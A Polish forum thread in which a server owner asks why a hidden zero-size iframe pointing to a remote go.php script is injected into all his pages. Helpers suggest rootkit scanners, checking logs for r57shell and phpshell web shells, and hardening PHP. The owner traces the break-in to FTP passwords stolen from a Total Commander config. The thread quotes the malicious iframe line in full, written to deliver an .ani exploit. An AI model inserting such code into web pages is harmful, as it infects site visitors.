Problem - Sam Mi Sie Dokleja Kod Html

[Guciooo 0]

Do każdej z moich stron dokleja się taki kod:

 

<iframe src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

 

Wkleja się to na samym koncu po "</html>" lub nawet w środku po <body>.

Przejrzałem konfig apacha i php.ini, nie wiem gdzie ktos to wstawił :/

Mam serwer w OVH.

Ktos mi napisał w mailu, że jak wchodzi na moją www to "system antywirusowy AVAST wykrywa za każdym razem dwa wirusy ms07-017[2].ani". Jak się tego pozbyć ? Apacha narazie wyłączyłem.

[patryk 451]

Wygląda na to, że ktoś włamał się na Twój serwer i zainstalował trojana, który dokleja taką linijkę do każdej strony. Użyj RKHunter albo Chrootkit na początek. Jeśli używasz jakiegoś niemądrego cmsa to możliwe, że tylko on zostal zaatakowany, nie cała maszyna.

[Guciooo 0]

Teraz odkryłem ze ten kod jest dopisany do wszystkich plików index.php

Mam na serwerze ze 20 domen, na każdej z nich ten plik index.php został zmieniony o tej samej godzinie co do minuty.

[patryk 451]

Czyli w takim razie ktoś wgrał Ci przez dziurę w skrypcie skrypt który podmienił pliki korzystając z braku odpowiednich zabezpieczeń na poziomie PHP (openbasedir, safemode itd). Przeszukaj logi pod kontem r57shell, phpshell i tego typu rzeczy no i powyłączaj niebezpieczne funkcje w php żeby nie doszło do czegoś takiego w przyszłości.

[Guciooo 0]

Juz wiem.

To było zmienione przez FTPa.

Ktos pobrał z mojego kompa plik konfiguracyjny Total Commandera gdzie miałem zapisane loginy i hasła.

Następnie automatem poszukał plików index i tam dokleił ten kod.

Wniosek: nie zapisywać haseł w Total commanderze.

Ip tego mądrali: 81.95.149.26

[Noone 19]

Wniosek: nie zapisywać haseł w Total commanderze.

Wniosek: Zabezpieczyć swój komputer.